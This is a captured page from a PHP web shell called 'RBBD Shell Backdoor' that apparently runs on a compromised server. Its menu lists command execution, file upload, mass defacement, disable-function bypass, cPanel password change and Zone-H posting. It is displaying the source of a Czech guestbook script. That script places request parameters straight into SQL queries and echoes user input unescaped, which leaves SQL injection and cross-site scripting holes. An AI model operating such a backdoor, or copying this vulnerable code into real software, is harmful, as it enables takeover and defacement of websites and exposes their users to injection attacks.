⚜ RBBD Shell Backdoor ⚜
Current Dir
:
D:
/
php
/
!!!
/
guestbook-strukturovane
/
Home
Upload
Command
Config
Jumping
Symlink
Mass Deface
Bypass Disable Function
K-RDP 5H3LL
Adminer
Change Password cPanel
Zone-H
Current File : D:/php/!!!/guestbook-strukturovane/gbook-modra.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="cs"> <head> <title> - Návštěvní kniha - </title> <link href="styly_modra.css" rel="stylesheet" type="text/css" media="screen"> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta http-equiv="content-language" content="cs"> <meta http-equiv="cache-control" content="no-cache"> <meta http-equiv="pragma" content="no-cache"> <meta name="description" content=" Návštěvní kniha."> <meta name="author" content="Antonin Danek"> <meta name="copyright" content="Antonin Danek"> </head> <body> <?php include "nastaveni.php"; $pripojeninaDB = mysql_connect ("$server","$user","$password") or die ("Nepovedlo se připojit na databázový server"); mysql_select_db("$databaze") or die ("Nepovedlo se otevřít databázi"); if(isset($_GET[odpovedet])) echo"Reagujete na příspěvěk s ID $_GET[odpovedet]"; echo" <table align=\"center\"> <tr><td> <form method=\"post\" name=\"form\" action=\"gbook.php\"> "; if(isset($_GET[odpovedet])) echo"<input type=\"hidden\" name=\"odpoved\" value=\"$_GET[odpovedet]\">"; echo" <b>Jméno:</b><br> <input type=text name=\"autor\" style=\"width:15em\" value=\"$_POST[autor]\"><br> E-mail:<br> <input type=text name=\"email\" style=\"width:15em\" value=\"$_POST[email]\"> <input type=\"radio\" name=\"mailing\" value=\"ano\" checked>Ano <input type=\"radio\" name=\"mailing\" value=\"ne\">Ne - sledovat diskuzi mailem<br> WWW:<br> <input type=text name=\"homepage\" style=\"width:15em\" value=\"$_POST[homepage]\"><br> <b>Příspěvek:</b><br> <textarea name=\"prispevek\" rows=\"10\" cols=\"30\">$_POST[prispevek]</textarea><br> "; ?> <SCRIPT type="text/javascript"> <!-- function add_smile(t){ document.form.prispevek.value+=''+ t +''; } --> </SCRIPT> <a href="javascript:add_smile('_:)_ ')"> <img src="ico/smail1.gif" border="0" alt=":)"> </a> <a href="javascript:add_smile('_;)_ ')"> <img src="ico/smail2.gif" border="0" alt=";)"> </a> <a href="javascript:add_smile('_:/_ ')"> <img src="ico/smail3.gif" border="0" alt=":/"> </a> <a href="javascript:add_smile('_:(_ ')"> <img src="ico/smail4.gif" border="0" alt=":("> </a> <a href="javascript:add_smile('_x(_ ')"> <img src="ico/smail5.gif" border="0" alt="x("> </a> <a href="javascript:add_smile('_x)_ ')"> <img src="ico/smail6.gif" border="0" alt="x)"> </a> <a href="javascript:add_smile('_:D_ ')"> <img src="ico/smail7.gif" border="0" alt=":D"> </a> <a href="javascript:add_smile('_:h_ ')"> <img src="ico/smail8.gif" border="0" alt=":h"> </a> <a href="javascript:add_smile('_:m_ ')"> <img src="ico/smail9.gif" border="0" alt=":m"> </a> <a href="javascript:add_smile('_:p_ ')"> <img src="ico/smail10.gif" border="0" alt=":p"> </a> <br> <a href="javascript:add_smile('[b][/b]')"> <img src="ico/b.jpg" border="0" alt="b"> </a> <a href="javascript:add_smile('[i][/i]')"> <img src="ico/i.jpg" border="0" alt="i"> </a> <a href="javascript:add_smile('[u][/u]')"> <img src="ico/u.jpg" border="0" alt="u"> </a> <a href="javascript:add_smile('[red][/red]')"> <img src="ico/red.jpg" border="0" alt="red"> </a> <a href="javascript:add_smile('[link][/link]')"> <img src="ico/link.jpg" border="0" alt="link"> </a> <br><br> <input type=submit name="odeslat" value="odeslat" id="tlacitko"> </form> </td></tr></table><hr> <? $znacky = array("_:)_","_;)_","_:/_","_:(_","_x(_","_x)_","_:D_","_:h_","_:m_","_:p_","[b]","[/b]", "[i]","[/i]","[u]","[/u]","[red]","[/red]","[link]","[/link]"); $tagy = array("<img src='ico/smail1.gif' border='0' alt=':-)'>", "<img src='ico/smail2.gif' border='0' alt=';-)'>", "<img src='ico/smail3.gif' border='0' alt=':-/'>", "<img src='ico/smail4.gif' border='0' alt=':-('>", "<img src='ico/smail5.gif' border='0' alt='x-('>", "<img src='ico/smail6.gif' border='0' alt='x-)'>", "<img src='ico/smail7.gif' border='0' alt=':-D'>", "<img src='ico/smail8.gif' border='0' alt=':h'>", "<img src='ico/smail9.gif' border='0' alt=':m'>", "<img src='ico/smail10.gif' border='0' alt=':p'>", "<b>","</b>","<i>","</i>","<u>","</u>", "<font color='red'>","</font>", "[<a href='","' target='_blank'>odkaz</a>]"); $html = strip_tags($_POST[prispevek]); $textik = str_replace($znacky,$tagy,$html); $koment_autor = strip_tags($_POST[autor]); if(isset($_POST[odeslat]) && $textik!=="" && $koment_autor!=="") { $email = strip_tags($_POST[email]); $homepage = strip_tags($_POST[homepage]); $format= "j/m/y - G:i"; $datum=date($format); if(isset($_POST[odpoved])) { $dotaz3 ="INSERT into odpovedi VALUES (0,\"$_POST[odpoved]\",\"$koment_autor\",\"$email\",\"$homepage\",\"$datum\",\"$textik\")"; $dotaz5 ="UPDATE guestbook SET odpoved = 1 WHERE id=$_POST[odpoved]"; $query5 = mysql_query($dotaz5) or die("SQL dotaz nešlo provést"); } if(!isset($_POST[odpoved])) $dotaz3 ="INSERT into guestbook VALUES (0,\"\",\"$koment_autor\",\"$email\",\"$homepage\",\"$datum\",\"$textik\")"; $query3 = mysql_query($dotaz3) or die("SQL dotaz nešlo provést"); if($_POST[mailing]=="ano") { if($email!=="") { $dotazX ="INSERT into mailing VALUES (0,\"$email\")"; $queryX = mysql_query($dotazX) or die("SQL dotaz nešlo provést"); }} $dotazY ="SELECT DISTINCT email from mailing"; $queryY = mysql_query($dotazY) or die("SQL dotaz nešlo provést"); while ($rowY = mysql_fetch_array($queryY)) { $mail_text = strip_tags($textik); $hlavicka ="From:$vas_mail"; $telo = iconv("UTF-8", "ISO-8859-2", " Dobrý den, tento e-mail vám přišel, protože jste si objednal(a) sledování příspěvků návštěvní knihy: $URL/gbook.php ------------------------------------------------------- !! Byl zaznamenán nový příspěvek !! ------------------------------------------------------- $mail_text Pokud si již nepřejete odebírat tato upozornění, prosím pokračujte zde: $URL/zrusit.php?email=$rowY[email] "); $predmet = iconv("UTF-8", "ISO-8859-2", "Novy prispevek v guestbooku $URL"); $post = mail("$rowY[email]",$predmet,$telo,$hlavicka); } } if(isset($_POST[odeslat]) && ($koment_autor=="" || $textik=="")) { ?> <br> <table class="error_message" align="center"> <tr> <td> <font class="error_message"> Děkujeme za váš zájem, nicméně odesílat příspěvek prázdný nebo nepodepsaný nemá smysl. </font> </td> </tr> </table><br> <? } $dotazZ ="SELECT count(*) FROM guestbook"; $queryZ = mysql_query($dotazZ) or die("SQL dotaz nešlo provést - pravděpodobně jste nespustili instalaci."); $prispevky=mysql_fetch_array($queryZ); $str=Ceil($prispevky[0] / $pocet_prispevku); Echo "<center>Strana: "; for($i=0;$i<$str;$i++) { if(($i*$pocet_prispevku)==$_GET[strana])echo $i+1; else echo " <a href='gbook.php?strana=".($i*$pocet_prispevku)."'>".($i+1)."</a> "; if(isset($_GET[strana])) $dotaz4 ="SELECT * FROM guestbook ORDER BY id DESC LIMIT $_GET[strana],$pocet_prispevku"; if(!isset($_GET[strana])) $dotaz4 ="SELECT * FROM guestbook ORDER BY id DESC LIMIT 0,$pocet_prispevku"; $query4 = mysql_query($dotaz4) or die("SQL dotaz nešlo provést"); } echo"</center><hr><br>"; while($row4=@mysql_fetch_array($query4)) { echo " <table align=\"center\" width=\"90%\"> <tr><td> <b>$row4[autor]</b>"; if($row4[email]!=="") { echo"<a href=\"mailto:$row4[email]\"> <img src=\"ico/mail.gif\" border=\"0\" alt=\"mail\"></a>"; } echo" - $row4[datum] <br>"; if($row4[homepage] !=="") { echo" <small>[<a href=\"$row4[homepage]\" target=\"_blank\">$row4[homepage]</a>]</small> "; } echo" </td></tr> <tr><td class=\"komentare\">"; echo stripslashes(nl2br($row4[prispevek])); echo"</td></tr> <tr><td>"; echo "<span style=\"position:relative;left:80%\"><small>[<a href=\"gbook.php?odpovedet=$row4[id]\">reagovat</a>]</small></span>"; echo"</td></tr></table>"; if($row4[odpoved]=="1") { $dotaz6 ="SELECT * FROM odpovedi WHERE reakce_na=$row4[id]"; $query6 = mysql_query($dotaz6) or die("SQL dotaz nešlo provést"); while($row6=@mysql_fetch_array($query6)) { echo " <br /> <table style=\"width:85%;border:dashed;border-width:1px;border-color:black;position:relative;left:10%\"> <tr><td> <b>$row6[autor]</b>"; if($row6[email]!=="") { echo"<a href=\"mailto:$row6[email]\"> <img src=\"ico/mail.gif\" border=\"0\" alt=\"mail\"></a>"; } echo" - $row6[datum] <br>"; if($row6[homepage] !=="") { echo" <small>[<a href=\"$row6[homepage]\" target=\"_blank\">$row6[homepage]</a>]</small> "; } echo" </td></tr> <tr><td class=\"komentare_odp\">"; echo stripslashes(nl2br($row6[prispevek])); echo"</td></tr> </table>"; } echo"<br>"; }} echo"<br>"; Echo "<hr><center>Strana: "; for($i=0;$i<$str;$i++) { if(($i*$pocet_prispevku)==$_GET[strana])echo $i+1; else echo " <a href='gbook.php?strana=".($i*$pocet_prispevku)."'>".($i+1)."</a> "; } ?> </center> <hr> <small>by <a href='mailto:DanekA@seznam.cz'>DanekA@seznam.cz</a></small> <p> <a href="http://validator.w3.org/check?uri=referer"><img src="http://www.w3.org/Icons/valid-html401" alt="Valid HTML 4.01 Transitional" height="31" width="88"></a> </p> </body> </html>
Fighter Anas Private Shell V.1 -
Royal
Battler BD
Copyright © Fighter Anas